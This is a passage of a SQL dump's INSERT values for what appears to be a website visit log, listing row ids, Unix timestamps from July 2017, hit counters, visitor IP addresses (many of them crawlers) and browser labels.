1501440595,1,0,1,0,'66.249.64.29',''),(139301,1501440709,1,0,1,0,'66.249.64.153',''),(139302,1501441136,1,1,0,0,'37.9.113.94','other'),(139303,1501441188,1,1,0,0,'178.154.171.42','other'),(139304,1501441207,1,1,0,0,'178.154.171.53','other'),(139305,1501441792,1,1,0,0,'178.154.171.45','other'),(139306,1501442185,1,1,0,0,'213.180.203.42','other'),(139307,1501442445,1,1,0,0,'51.255.65.70','other'),(139308,1501443501,1,1,0,0,'178.154.171.18','other'),(139309,1501443508,1,1,0,0,'213.180.203.43','other'),(139310,1501443529,1,1,0,0,'95.108.181.52','other'),(139311,1501443629,2,2,0,0,'216.244.66.246','other'),(139312,1501443860,1,1,0,0,'37.9.113.138','other'),(139313,1501443899,1,1,0,0,'5.45.207.64','other'),(139314,1501444183,1,0,1,0,'66.249.64.28',''),(139315,1501444985,1,1,0,0,'37.9.113.138','other'),(139316,1501445030,1,1,0,0,'207.46.13.109','other'),(139317,1501445195,1,1,0,0,'213.180.203.42','other'),(139318,1501445226,1,1,0,0,'95.108.181.63','other'),(139319,1501445247,2,2,0,0,'5.45.207.56','other'),(139320,1501445566,1,1,0,0,'37.9.113.128','other'),(139321,1501445597,1,0,1,0,'66.249.64.29',''),(139322,1501445845,1,1,0,0,'217.182.132.155','other'),(139323,1501446111,1,1,0,0,'5.45.207.64','other'),(139324,1501446147,1,1,0,0,'213.180.203.21','other'),(139325,1501446413,1,1,0,0,'51.255.65.68','other'),(139326,1501446473,1,1,0,0,'95.108.181.69','other'),(139327,1501446557,2,2,0,0,'178.154.171.42','other'),(139328,1501446747,1,1,0,0,'217.182.132.172','other'),(139329,1501446953,1,1,0,0,'178.154.171.18','other'),(139330,1501447482,1,1,0,0,'8.29.198.27','other'),(139331,1501448119,1,1,0,0,'217.182.132.157','other'),(139332,1501448135,1,1,0,0,'95.108.181.57','other'),(139333,1501448400,1,1,0,0,'178.154.171.42','other'),(139334,1501448607,1,1,0,0,'51.255.65.45','other'),(139335,1501448915,1,1,0,0,'217.182.132.154','other'),(139336,1501449348,1,1,0,0,'213.180.203.25','other'),(139337,1501449780,2,2,0,0,'213.180.203.14','other'),(139338,1501449892,1,1,0,0,'213.180.203.32','other'),(139339,1501449910,1,1,0,0,'66.249.64.28','chrome'),(139340,1501449990,3,3,0,0,'216.244.66.246','other'),(139341,1501450026,1,1,0,0,'51.255.65.52','other'),(139342,1501450158,1,1,0,0,'5.45.207.83','other'),(139343,1501450444,1,1,0,0,'213.180.203.18','other'),(139344,1501450509,1,1,0,0,'217.182.132.32','other'),(139345,1501450622,1,0,1,0,'66.249.64.30',''),(139346,1501450693,1,1,0,0,'51.255.65.18','other'),(139347,1501450770,1,1,0,0,'51.255.65.38','other'),(139348,1501450833,1,1,0,0,'51.255.71.111','other'),(139349,1501451206,2,2,0,0,'216.244.66.246','other'),(139350,1501451265,1,1,0,0,'5.45.207.57','other'),(139351,1501451272,2,2,0,0,'178.154.171.45','other'),(139352,1501451510,1,0,1,0,'66.249.64.153',''),(139353,1501451787,1,1,0,0,'37.9.113.78','other'),(139354,1501451825,1,1,0,0,'51.255.65.53','other'),(139355,1501451961,1,1,0,0,'51.255.65.92','other'),(139356,1501452117,2,2,0,0,'95.108.181.58','other'),(139357,1501452278,1,1,0,0,'213.180.203.18','other'),(139358,1501452317,1,1,0,0,'217.182.132.76','other'),(139359,1501452369,1,1,0,0,'213.180.203.43','other'),(139360,1501452650,1,1,0,0,'51.255.71.132','other'),(139361,1501452745,1,1,0,0,'51.255.65.94','other'),(139362,1501453026,1,1,0,0,'51.255.71.100','other'),(139363,1501453090,1,1,0,0,'217.69.133.203','other'),(139364,1501453270,1,1,0,0,'217.182.132.94','other'),(139365,1501453504,1,1,0,0,'51.255.65.23','other'),(139366,1501453855,1,1,0,0,'178.154.171.59','other'),(139367,1501454009,1,1,0,0,'216.244.66.194','other'),(139368,1501454964,1,1,0,0,'217.182.132.79','other'),(139369,1501455089,1,1,0,0,'217.182.132.81','other'),(139370,1501455311,1,1,0,0,'37.9.113.128','other'),(139371,1501455457,1,1,0,0,'178.154.171.18','other'),(139372,1501455493,1,0,1,0,'66.249.64.30',''),(139373,1501455525,1,1,0,0,'95.108.181.69','other'),(139374,1501455648,1,1,0,0,'213.180.203.18','other'),(139375,1501455736,1,1,0,0,'51.255.65.67','other'),(139376,1501455956,1,1,0,0,'5.45.207.64','other'),(139377,1501456262,1,1,0,0,'178.154.171.59','other'),(139378,1501456684,1,1,0,0,'217.182.132.174','other'),(139379,1501457455,1,1,0,0,'217.69.133.6','other'),(139380,1501457525,1,1,0,0,'216.244.66.246','other'),(139381,1501457625,1,1,0,0,'207.46.13.70','other'),(139382,1501457839,6,6,0,0,'216.244.66.194','other'),(139383,1501458306,1,1,0,0,'8.29.198.26','other'),(139384,1501458328,1,1,0,0,'164.132.162.157','other'),(139385,1501458329,1,1,0,0,'213.180.203.18','other'),(139386,1501458649,1,1,0,0,'46.118.156.191','firefox'),(139387,1501459050,1,1,0,0,'213.180.203.32','other'),(139388,1501459061,7,7,0,0,'216.244.66.246','other'),(139389,1501459273,1,1,0,0,'51.255.65.82','other'),(139390,1501459411,1,0,1,0,'66.249.76.107',''),(139391,1501459417,1,1,0,0,'51.255.65.27','other'),(139392,1501459591,1,1,0,0,'95.108.181.52','other'),(139393,1501459614,1,1,0,0,'51.255.65.66','other'),(139394,1501459632,1,0,1,0,'66.249.66.76',''),(139395,1501459737,1,1,0,0,'81.1.242.33','other'),(139396,1501459765,1,1,0,0,'178.154.171.59','other'),(139397,1501459924,1,1,0,0,'213.180.203.25','other'),(139398,1501459927,1,1,0,0,'178.154.171.72','other'),(139399,1501459998,2,2,0,0,'216.244.66.246','other'),(139400,1501460052,1,1,0,0,'137.74.207.109','other'),(139401,1501460218,1,1,0,0,'137.74.207.108','other'),(139402,1501460272,1,1,0,0,'137.74.207.102','other'),(139403,1501460491,1,1,0,0,'217.182.132.188','other'),(139404,1501460951,1,1,0,0,'95.108.181.58','other'),(139405,1501460975,2,2,0,0,'213.180.203.18','other'),(139406,1501462018,1,1,0,0,'51.255.71.118','other'),(139407,1501462195,1,1,0,0,'207.46.13.109','other'),(139408,1501463131,1,1,0,0,'217.182.132.27','other'),(139409,1501464137,1,1,0,0,'207.46.13.109','other'),(139410,1501464184,1,1,0,0,'95.108.181.57','other'),(139411,1501464488,1,0,1,0,'66.249.66.156',''),(139412,1501464502,1,0,1,0,'66.249.66.155',''),(139413,1501464812,1,1,0,0,'95.108.181.69','other'),(139414,1501464984,1,1,0,0,'178.154.171.72','other'),(139415,1501465404,1,1,0,0,'137.74.207.114','other'),(139416,1501465428,1,1,0,0,'37.9.113.78','other'),(139417,1501465724,1,1,0,0,'51.255.65.64','other'),(139418,1501466443,1,1,0,0,'217.69.133.203','other'),(139419,1501466568,1,0,1,0,'66.249.76.109',''),(139420,1501466622,1,1,0,0,'178.154.171.3','other'),(139421,1501466789,1,1,0,0,'157.55.39.153','other'),(139422,1501467536,1,1,0,0,'217.182.132.183','other'),(139423,1501467613,1,1,0,0,'178.154.171.59','other'),(139424,1501467668,1,1,0,0,'51.255.71.118','other'),(139425,1501467929,1,1,0,0,'213.180.203.42','other'),(139426,1501467999,1,1,0,0,'5.45.207.57','other'),(139427,1501468003,1,1,0,0,'95.108.181.52','other'),(139428,1501468094,1,1,0,0,'51.255.65.97','other'),(139429,1501468588,1,1,0,0,'164.132.162.188','other'),(139430,1501468721,1,1,0,0,'178.154.171.53','other'),(139431,1501468785,1,1,0,0,'213.180.203.18','other'),(139432,1501468823,1,1,0,0,'51.255.65.33','other'),(139433,1501468845,1,1,0,0,'51.255.65.56','other'),(139434,1501469126,1,1,0,0,'8.29.198.27','other'),(139435,1501469370,1,1,0,0,'95.108.181.60','other'),(139436,1501469564,3,3,0,0,'216.244.66.246','other'),(139437,1501469705,1,1,0,0,'178.154.171.59','other'),(139438,1501470301,1,1,0,0,'217.69.133.2','other'),(139439,1501470917,1,1,0,0,'217.182.132.176','other'),(139440,1501471365,1,1,0,0,'213.180.203.43','other'),(139441,1501471746,1,1,0,0,'37.9.113.94','other'),(139442,1501471971,1,1,0,0,'178.154.171.42','other'),(139443,1501472760,1,1,0,0,'164.132.162.158','other'),(139444,1501472896,1,1,0,0,'137.74.201.108','other'),(139445,1501473484,1,1,0,0,'5.45.207.66','other'),(139446,1501473536,1,1,0,0,'178.154.171.18','other'),(139447,1501474057,1,1,0,0,'164.132.164.180','other'),(139448,1501474091,1,1,0,0,'195.154.168.130','chrome'),(139449,1501474125,2,2,0,0,'51.255.65.43','other'),(139450,1501474182,1,1,0,0,'217.182.132.155','other'),(139451,1501474469,1,1,0,0,'66.249.76.109','chrome'),(139452,1501474603,1,0,1,0,'66.249.76.107',''),(139453,1501474748,1,1,0,0,'217.182.132.180','other'),(139454,1501474787,1,1,0,0,'217.182.132.170','other'),(139455,1501475197,1,1,0,0,'217.182.132.191','other'),(139456,1501475328,1,1,0,0,'178.154.171.42','other'),(139457,1501475598,1,1,0,0,'213.180.203.25','other'),(139458,1501475689,1,1,0,0,'91.196.178.68','firefox'),(139459,1501475785,1,1,0,0,'95.108.181.63','other'),(139460,1501475830,1,1,0,0,'51.255.65.43','other'),(139461,1501475901,1,1,0,0,'51.255.65.54','other'),(139462,1501475993,2,2,0,0,'95.213.141.126','opera'),(139463,1501476142,1,1,0,0,'157.55.39.45','other'),(139464,1501477557,1,1,0,0,'5.45.207.56','other'),(139465,1501478409,1,1,0,0,'51.255.65.6','other'),(139466,1501478451,1,1,0,0,'217.182.132.150','other'),(139467,1501478539,1,1,0,0,'51.255.65.20','other'),(139468,1501478560,1,1,0,0,'178.154.171.18','other'),(139469,1501478636,2,2,0,0,'178.154.171.3','other'),(139470,1501478741,1,1,0,0,'66.249.76.89','chrome'),(139471,1501478873,1,1,0,0,'180.76.15.154','other'),(139472,1501479019,1,1,0,0,'137.74.207.109','other'),(139473,1501479148,1,1,0,0,'207.46.13.109','other'),(139474,1501479263,1,1,0,0,'217.182.132.6','other'),(139475,1501479463,4,4,0,0,'216.244.66.246','other'),(139476,1501479506,1,1,0,0,'51.255.65.45','other'),(139477,1501479928,1,1,0,0,'213.180.203.32','other'),(139478,1501479952,1,1,0,0,'8.29.198.27','other'),(139479,1501480028,1,1,0,0,'157.55.39.153','other'),(139480,1501480096,1,1,0,0,'66.102.9.25','chrome'),(139481,1501480290,1,1,0,0,'51.255.65.5','other'),(139482,1501480300,2,2,0,0,'213.180.203.18','other'),(139483,1501480428,1,1,0,0,'37.9.113.94','other'),(139484,1501480667,1,1,0,0,'37.9.113.78','other'),(139485,1501480942,1,1,0,0,'178.154.171.45','other'),(139486,1501481005,1,1,0,0,'91.196.178.67','chrome'),(139487,1501481192,1,1,0,0,'109.86.72.27','chrome'),(139488,1501481227,1,1,0,0,'51.255.71.118','other'),(139489,1501481389,1,1,0,0,'137.74.207.110','other'),(139490,1501481414,1,1,0,0,'51.255.71.131','other'),(139491,1501481422,1,1,0,0,'217.182.132.83','other'),(139492,1501481654,1,1,0,0,'213.180.203.18','other'),(139493,1501482597,1,1,0,0,'213.180.203.25','other'),(139494,1501482658,1,1,0,0,'5.45.207.66','other'),(139495,1501482711,1,1,0,0,'51.255.65.8','other'),(139496,1501483136,1,1,0,0,'193.19.152.77','firefox'),(139497,1501483150,1,1,0,0,'51.255.65.16','other'),(139498,1501483361,1,1,0,0,'95.108.181.63','other'),(139499,1501483502,1,1,0,0,'37.9.113.128','other'),(139500,1501483702,1,0,1,0,'66.249.76.109',''),(139501,1501484240,1,1,0,0,'217.182.132.63','other'),(139502,1501484321,1,1,0,0,'37.9.113.138','other'),(139503,1501484512,1,1,0,0,'217.182.132.14','other'),(139504,1501484529,1,1,0,0,'217.182.132.170','other'),(139505,1501484842,1,1,0,0,'95.108.181.57','other'),(139506,1501484884,1,1,0,0,'51.255.65.53','other'),(139507,1501484906,2,2,0,0,'178.95.228.102','firefox'),(139508,1501485142,1,1,0,0,'91.196.178.161','chrome'),(139509,1501485689,1,1,0,0,'217.182.132.52','other'),(139510,1501486017,1,1,0,0,'217.182.132.21','other'),(139511,1501486304,3,3,0,0,'216.244.66.194','other'),(139512,1501486664,1,1,0,0,'51.255.65.92','other'),(139513,1501486867,1,1,0,0,'217.182.132.54','other'),(139514,1501487256,1,1,0,0,'91.196.178.66','firefox'),(139515,1501487452,2,2,0,0,'216.244.66.194','other'),(139516,1501487657,3,3,0,0,'163.172.108.151','chrome'),(139517,1501487671,1,1,0,0,'178.140.51.174','chrome'),(139518,1501487678,1,1,0,0,'188.244.43.200','chrome'),(139519,1501487679,1,1,0,0,'176.14.203.61','chrome'),(139521,1501487680,1,1,0,0,'213.141.131.237','chrome'),(139523,1501487685,1,1,0,0,'77.37.242.29','chrome'),(139525,1501487690,1,1,0,0,'2.92.192.30','chrome'),(139526,1501487701,1,1,0,0,'128.72.221.187','chrome'),(139527,1501487702,1,1,0,0,'46.42.129.213','chrome'),(139528,1501488064,1,1,0,0,'95.108.181.52','other'),(139529,1501488099,1,1,0,0,'91.229.121.3','firefox'),(139530,1501488271,1,1,0,0,'78.111.187.114','firefox'),(139531,1501488604,1,1,0,0,'5.45.207.64','other'),(139532,1501488635,1,1,0,0,'217.182.132.146','other'),(139533,1501488856,1,1,0,0,'51.255.71.110','other'),(139534,1501488942,1,1,0,0,'91.196.178.66','chrome'),(139535,1501488994,2,2,0,0,'95.108.181.69','other'),(139536,1501489010,1,0,1,0,'66.249.76.89',''),(139537,1501489020,1,1,0,0,'66.249.76.89','chrome'),(139538,1501489716,1,1,0,0,'178.154.171.53','other'),(139539,1501490021,1,1,0,0,'91.196.178.66','chrome'),(139540,1501490113,1,1,0,0,'82.145.221.194','chrome'),(139541,1501490145,1,1,0,0,'37.9.113.138','other'),(139542,1501490155,1,1,0,0,'213.180.203.21','other'),(139543,1501490776,1,1,0,0,'8.29.198.26','other'),(139544,1501491082,1,1,0,0,'216.244.66.246','other'),(139545,1501491306,1,1,0,0,'217.182.132.34','other'),(139546,1501491350,1,1,0,0,'66.249.66.157','chrome'),(139547,1501491469,1,1,0,0,'95.108.181.60','other'),(139548,1501492031,1,1,0,0,'5.45.207.57','other'),(139549,1501492042,1,1,0,0,'37.55.189.180','chrome'),(139550,1501492096,1,1,0,0,'95.108.181.58','other'),(139551,1501492148,2,2,0,0,'216.244.66.246','other'),(139552,1501492606,1,1,0,0,'217.182.132.52','other'),(139553,1501492747,1,1,0,0,'91.196.178.67','chrome'),(139554,1501493320,1,1,0,0,'207.46.13.70','other'),(139555,1501493364,1,1,0,0,'195.154.168.130','chrome'),(139556,1501493536,1,1,0,0,'51.255.65.30','other'),(139557,1501493754,7,7,0,0,'216.244.66.194','other'),(139558,1501493759,1,1,0,0,'217.182.132.181','other'),(139559,1501493959,1,1,0,0,'91.196.178.67','chrome'),(139560,1501494266,1,1,0,0,'213.180.203.21','other'),(139561,1501494351,1,0,1,0,'66.249.76.89',''),(139562,1501494401,1,1,0,0,'178.154.171.53','other'),(139563,1501494680,1,1,0,0,'51.255.65.30','other'),(139564,1501494843,1,1,0,0,'137.74.207.188','other'),(139565,1501494869,1,1,0,0,'91.196.178.67','chrome'),(139566,1501495100,1,1,0,0,'217.182.132.97','other'),(139567,1501495244,1,1,0,0,'178.154.171.42','other'),(139568,1501495834,1,1,0,0,'51.255.65.74','other'),(139569,1501495892,1,1,0,0,'46.174.163.134','chrome'),(139570,1501496158,1,1,0,0,'213.180.203.21','other'),(139571,1501496231,1,1,0,0,'66.249.66.156','chrome'),(139572,1501496399,1,1,0,0,'217.182.132.25','other'),(139573,1501496411,1,1,0,0,'178.154.171.72','other'),(139574,1501496466,1,1,0,0,'51.255.71.126','other'),(139575,1501496596,1,1,0,0,'217.182.132.191','other'),(139576,1501496682,1,1,0,0,'78.154.174.54','opera'),(139577,1501496691,1,1,0,0,'46.201.169.139','chrome'),(139578,1501496783,1,1,0,0,'95.108.181.52','other'),(139579,1501497306,1,1,0,0,'213.180.203.42','other'),(139580,1501497569,1,1,0,0,'51.255.65.86','other'),(139581,1501497593,1,1,0,0,'213.180.203.32','other'),(139582,1501497643,1,1,0,0,'164.132.162.158','other'),(139583,1501497736,1,1,0,0,'91.196.178.69','chrome'),(139584,1501497914,1,1,0,0,'51.255.65.97','other'),(139585,1501498219,1,1,0,0,'37.9.113.66','other'),(139586,1501498234,1,1,0,0,'216.244.66.246','other'),(139587,1501498322,1,1,0,0,'95.108.181.57','other'),(139588,1501498493,1,1,0,0,'217.182.132.240','other'),(139589,1501498623,1,1,0,0,'157.55.39.153','other'),(139590,1501498640,1,1,0,0,'46.229.168.71','other'),(139591,1501498646,1,1,0,0,'178.154.171.42','other'),(139592,1501498650,1,1,0,0,'217.69.133.5','other'),(139593,1501498667,1,1,0,0,'217.182.132.20','other'),(139594,1501498716,2,2,0,0,'216.244.66.194','other'),(139595,1501498971,1,1,0,0,'95.108.181.63','other'),(139596,1501499068,1,1,0,0,'46.174.163.134','chrome'),(139597,1501499587,1,1,0,0,'164.132.164.180','other'),(139598,1501499772,1,1,0,0,'207.46.13.70','other'),(139599,1501499817,1,1,0,0,'95.132.142.136','chrome'),(139600,1501499932,1,1,0,0,'213.180.203.18','other'),(139601,1501500322,9,9,0,0,'216.244.66.246','other'),(139602,1501501181,1,1,0,0,'91.196.178.67','chrome'),(139603,1501501239,1,1,0,0,'95.132.119.173','firefox'),(139604,1501501581,1,1,0,0,'81.1.242.33','other'),(139605,1501501600,1,1,0,0,'8.29.198.25','other'),(139606,1501502256,1,1,0,0,'213.180.203.32','other'),(139607,1501502439,1,1,0,0,'176.31.231.10','other'),(139608,1501502440,1,1,0,0,'37.54.124.13','firefox'),(139609,1501502704,1,1,0,0,'217.182.132.55','other'),(139610,1501502952,1,1,0,0,'46.161.9.39','chrome'),(139611,1501503097,1,1,0,0,'217.182.132.176','other'),(139612,1501503101,2,2,0,0,'173.212.242.123','other'),(139613,1501503425,1,1,0,0,'66.249.66.157','chrome'),(139614,1501503628,1,1,0,0,'37.9.113.128','other'),(139615,1501503694,1,1,0,0,'137.74.207.188','other'),(139616,1501504552,1,1,0,0,'91.196.178.67','chrome'),(139617,1501504619,1,1,0,0,'5.45.207.66','other'),(139618,1501504690,1,1,0,0,'194.37.248.11','chrome'),(139619,1501504737,1,1,0,0,'95.135.212.249','firefox'),(139620,1501504889,5,5,0,0,'216.244.66.194','other'),(139621,1501504980,1,1,0,0,'178.154.171.42','other'),(139622,1501505118,1,1,0,0,'95.108.181.69','other'),(139623,1501505124,1,1,0,0,'91.196.178.162','chrome'),(139624,1501505669,1,1,0,0,'217.182.132.78','other'),(139625,1501505783,1,1,0,0,'46.201.175.91','firefox'),(139626,1501506073,1,1,0,0,'5.45.207.66','other'),(139627,1501506139,1,1,0,0,'91.196.178.67','firefox'),(139628,1501506234,1,1,0,0,'91.196.178.67','chrome'),(139629,1501506322,1,1,0,0,'178.154.171.45','other'),(139630,1501506474,1,1,0,0,'51.255.71.125','other'),(139631,1501506572,1,1,0,0,'91.196.178.70','chrome'),(139632,1501506772,1,1,0,0,'91.196.178.165','chrome'),(139633,1501506785,1,1,0,0,'157.55.39.45','other'),(139634,1501506816,1,1,0,0,'94.179.68.243','firefox'),(139635,1501506944,1,1,0,0,'91.196.178.71','chrome'),(139636,1501507812,1,1,0,0,'37.73.240.61','chrome'),(139637,1501507827,1,1,0,0,'46.200.222.70','chrome'),(139638,1501507985,1,1,0,0,'217.182.132.91','other'),(139639,1501507996,1,1,0,0,'46.174.163.134','chrome'),(139640,1501508398,1,0,1,0,'66.249.76.107',''),(139641,1501508449,1,1,0,0,'51.255.65.92','other'),(139642,1501508867,1,1,0,0,'37.73.240.61','chrome'),(139643,1501509102,1,0,1,0,'66.249.76.93',''),(139644,1501509168,1,1,0,0,'31.43.26.68','chrome'),(139645,1501509175,1,1,0,0,'37.52.25.201','chrome'),(139646,1501509198,1,1,0,0,'213.180.203.25','other'),(139647,1501509332,1,1,0,0,'51.255.65.86','other'),(139648,1501509772,1,1,0,0,'91.196.178.165','chrome'),(139649,1501509885,1,1,0,0,'217.182.132.57','other'),(139650,1501509897,1,1,0,0,'37.9.113.66','other'),(139651,1501510055,1,1,0,0,'194.37.248.11','chrome'),(139652,1501510285,1,1,0,0,'217.182.132.152','other'),(139653,1501510488,1,1,0,0,'51.255.65.68','other'),(139654,1501510729,1,1,0,0,'51.255.71.115','other'),(139655,1501510935,1,1,0,0,'137.74.207.101','other'),(139656,1501511073,1,1,0,0,'195.154.168.130','chrome'),(139657,1501511161,1,1,0,0,'217.182.132.156','other'),(139658,1501511229,1,1,0,0,'217.182.132.5','other'),(139659,1501511301,1,1,0,0,'217.182.132.186','other'),(139660,1501511601,1,1,0,0,'37.9.113.128','other'),(139661,1501511651,1,1,0,0,'51.255.65.48','other'),(139662,1501511921,8,8,0,0,'216.244.66.246','other'),(139663,1501512427,1,1,0,0,'8.29.198.26','other'),(139664,1501512669,1,1,0,0,'51.255.65.5','other'),(139665,1501513744,1,1,0,0,'217.182.132.72','other'),(139666,1501514938,4,4,0,0,'216.244.66.194','other'),(139667,1501515121,1,1,0,0,'5.45.207.56','other'),(139668,1501515411,1,1,0,0,'217.182.132.182','other'),(139669,1501515930,1,1,0,0,'51.255.65.42','other'),(139670,1501516724,1,1,0,0,'213.180.203.25','other'),(139671,1501517185,2,2,0,0,'95.108.181.52','other'),(139672,1501518381,1,1,0,0,'178.154.171.18','other'),(139673,1501518413,1,1,0,0,'51.255.65.39','other'),(139674,1501518856,1,1,0,0,'137.74.207.161','other'),(139675,1501518923,1,1,0,0,'178.154.171.42','other'),(139676,1501519386,1,1,0,0,'217.182.132.170','other'),(139677,1501519404,1,1,0,0,'217.182.132.35','other'),(139678,1501519606,1,1,0,0,'217.182.132.73','other'),(139679,1501519619,1,1,0,0,'95.108.181.58','other'),(139680,1501519905,1,1,0,0,'217.182.132.156','other'),(139681,1501520019,1,1,0,0,'95.108.181.52','other'),(139682,1501520251,1,1,0,0,'217.182.132.7','other'),(139683,1501520337,1,1,0,0,'217.182.132.5','other'),(139684,1501521108,1,1,0,0,'217.182.132.77','other'),(139685,1501521649,1,1,0,0,'51.255.65.84','other'),(139686,1501521756,1,1,0,0,'157.55.39.153','other'),(139687,1501521877,2,2,0,0,'216.244.66.246','other'),(139688,1501521946,1,1,0,0,'95.108.181.63','other'),(139689,1501522429,1,1,0,0,'51.255.65.87','other'),(139690,1501522520,1,1,0,0,'178.154.171.42','other'),(139691,1501522764,1,1,0,0,'178.154.171.53','other'),(139692,1501522875,1,1,0,0,'95.108.181.69','other'),(139693,1501523018,4,4,0,0,'216.244.66.246','other'),(139694,1501523254,1,1,0,0,'8.29.198.25','other'),(139695,1501523440,1,1,0,0,'37.9.113.66','other'),(139696,1501523492,1,1,0,0,'178.154.171.42','other'),(139697,1501523521,1,1,0,0,'5.45.207.83','other'),(139698,1501523800,1,1,0,0,'51.255.65.57','other'),(139699,1501524370,1,1,0,0,'5.45.207.57','other'),(139700,1501524682,1,1,0,0,'5.45.207.66','other'),(139701,1501525192,1,0,1,0,'66.249.76.108',''),(139702,1501525629,1,1,0,0,'54.76.17.53','other'),(139703,1501526247,1,1,0,0,'217.182.132.86','other'),(139704,1501526290,3,3,0,0,'216.244.66.194','other'),(139705,1501526515,1,1,0,0,'180.76.15.6','other'),(139706,1501526567,1,1,0,0,'51.255.71.116','other'),(139707,1501526785,1,1,0,0,'217.182.132.188','other'),(139708,1501527012,1,0,1,0,'66.249.76.108',''),(139709,1501527020,1,1,0,0,'188.32.190.203','msie'),(139710,1501527176,1,1,0,0,'217.182.132.77','other'),(139711,1501527291,1,1,0,0,'51.255.65.92','other'),(139712,1501527438,1,1,0,0,'157.55.39.153','other'),(139713,1501527473,1,1,0,0,'178.154.171.3','other'),(139714,1501527689,1,0,1,0,'66.249.66.76',''),(139715,1501527697,1,1,0,0,'66.249.66.74','chrome'),(139716,1501527828,1,0,1,0,'66.249.66.156',''),(139717,1501527851,1,1,0,0,'37.204.68.12','msie'),(139718,1501528884,1,1,0,0,'157.55.39.153','other'),(139719,1501529136,1,1,0,0,'95.108.181.57','other'),(139720,1501529587,1,1,0,0,'217.182.132.148','other'),(139721,1501529641,1,1,0,0,'217.182.132.79','other'),(139722,1501529659,1,1,0,0,'51.255.71.125','other'),(139723,1501529699,1,1,0,0,'217.182.132.178','other'),(139724,1501529911,1,1,0,0,'51.255.65.45','other'),(139725,1501530071,1,1,0,0,'217.182.132.96','other'),(139726,1501530194,1,1,0,0,'178.154.171.42','other'),(139727,1501530776,1,1,0,0,'195.154.168.130','chrome'),(139728,1501531104,1,1,0,0,'51.255.71.114','other'),(139729,1501531825,1,1,0,0,'217.182.132.241','other'),(139730,1501531843,1,1,0,0,'66.249.66.156','chrome'),(139731,1501532153,1,1,0,0,'217.182.132.19','other'),(139732,1501532238,1,1,0,0,'164.132.164.180','other'),(139733,1501532963,1,1,0,0,'95.108.181.63','other'),(139734,1501533084,8,8,0,0,'216.244.66.246','other'),(139735,1501533155,1,1,0,0,'217.182.132.97','other'),(139736,1501533332,1,1,0,0,'5.45.207.66','other'),(139737,1501533632,1,1,0,0,'178.154.171.18','other'),(139738,1501534021,1,1,0,0,'217.182.132.185','other'),(139739,1501534077,1,1,0,0,'8.29.198.27','other'),(139740,1501534137,1,1,0,0,'217.182.132.71','other'),(139741,1501534246,1,1,0,0,'217.182.132.81','other'),(139742,1501534442,1,1,0,0,'188.163.17.49','chrome'),(139743,1501534647,1,1,0,0,'51.255.65.4','other'),(139744,1501534661,1,1,0,0,'51.255.65.51','other'),(139745,1501534751,1,1,0,0,'217.182.132.153','other'),(139746,1501535748,1,1,0,0,'207.46.13.109','other'),(139747,1501535810,1,1,0,0,'51.255.65.16','other'),(139748,1501535826,1,1,0,0,'5.45.207.56','other'),(139749,1501535883,1,1,0,0,'51.255.71.101','other'),(139750,1501535962,1,1,0,0,'164.132.162.188','other'),(139751,1501536001,1,1,0,0,'95.108.181.69','other'),(139752,1501536546,1,1,0,0,'213.180.203.43','other'),(139753,1501536630,1,1,0,0,'91.209.11.236','other'),(139754,1501537449,1,1,0,0,'109.173.57.51','firefox'),(139755,1501538016,1,1,0,0,'51.255.65.72','other'),(139756,1501538074,1,1,0,0,'217.182.132.154','other'),(139757,1501538209,1,1,0,0,'151.80.27.118','other'),(139758,1501538391,1,1,0,0,'51.255.71.110','other'),(139759,1501538571,1,0,1,0,'68.180.229.223',''),(139760,1501538631,1,1,0,0,'51.255.71.98','other'),(139761,1501538687,1,1,0,0,'51.255.71.113','other'),(139762,1501538963,1,1,0,0,'5.45.207.57','other'),(139763,1501539099,1,1,0,0,'51.255.71.125','other'),(139764,1501539273,1,1,0,0,'5.45.207.83','other'),(139765,1501539966,1,1,0,0,'51.255.65.53','other'),(139766,1501540522,1,1,0,0,'217.182.132.95','other'),(139767,1501540604,1,1,0,0,'81.1.242.33','other'),(139768,1501540634,1,1,0,0,'164.132.162.158','other'),(139769,1501541386,1,1,0,0,'95.108.181.57','other'),(139770,1501541390,1,1,0,0,'178.154.171.42','other'),(139771,1501541624,1,1,0,0,'51.255.65.11','other'),(139772,1501541762,1,1,0,0,'37.115.109.129','chrome'),(139773,1501542133,1,1,0,0,'51.255.71.114','other'),(139774,1501542422,1,1,0,0,'51.255.65.65','other'),(139775,1501542577,1,1,0,0,'178.154.171.45','other'),(139776,1501542827,1,1,0,0,'95.108.181.58','other'),(139777,1501542893,8,8,0,0,'216.244.66.246','other'),(139778,1501542994,1,1,0,0,'51.255.65.29','other'),(139779,1501543067,1,1,0,0,'95.108.181.60','other'),(139780,1501543277,1,1,0,0,'66.249.76.93','chrome'),(139781,1501543281,1,1,0,0,'66.249.66.74','chrome'),(139782,1501544188,1,1,0,0,'95.108.181.58','other'),(139783,1501544252,1,1,0,0,'51.255.65.25','other'),(139784,1501544724,1,1,0,0,'164.132.162.164','other'),(139785,1501544842,1,1,0,0,'51.255.65.80','other'),(139786,1501544902,1,1,0,0,'8.29.198.26','other'),(139787,1501545020,1,0,1,0,'66.249.76.108',''),(139788,1501545027,1,0,1,0,'66.249.76.107',''),(139789,1501545113,1,1,0,0,'5.45.207.57','other'),(139790,1501545439,6,6,0,0,'216.244.66.194','other'),(139791,1501545628,1,1,0,0,'51.255.65.61','other'),(139792,1501545941,1,1,0,0,'207.46.13.109','other'),(139793,1501546289,1,1,0,0,'51.255.65.32','other'),(139794,1501547376,1,1,0,0,'178.154.171.36','other'),(139795,1501547629,1,1,0,0,'178.154.171.45','other'),(139796,1501547870,1,1,0,0,'51.255.65.79','other'),(139797,1501547983,1,1,0,0,'137.74.203.194','other'),(139798,1501548088,1,1,0,0,'217.182.132.19','other'),(139799,1501548454,1,1,0,0,'66.249.76.89','chrome'),(139800,1501549224,6,6,0,0,'216.244.66.194','other'),(139801,1501549441,1,1,0,0,'217.182.132.177','other'),(139802,1501549614,1,1,0,0,'216.244.66.237','other'),(139803,1501549839,1,1,0,0,'51.255.65.80','other'),(139804,1501550179,1,1,0,0,'217.182.132.67','other'),(139805,1501550397,1,1,0,0,'54.218.94.28','chrome'),(139806,1501550876,1,1,0,0,'51.255.65.53','other'),(139807,1501551378,1,1,0,0,'217.182.132.77','other'),(139808,1501551492,1,1,0,0,'51.255.65.50','other'),(139809,1501551649,1,0,1,0,'66.249.76.109',''),(139810,1501551814,2,2,0,0,'216.244.66.246','other'),(139811,1501552202,1,1,0,0,'217.182.132.73','other'),(139812,1501552654,1,1,0,0,'51.255.65.31','other'),(139813,1501552686,1,1,0,0,'51.255.65.63','other'),(139814,1501553285,1,1,0,0,'51.255.65.50','other'),(139815,1501553832,1,1,0,0,'137.74.207.109','other'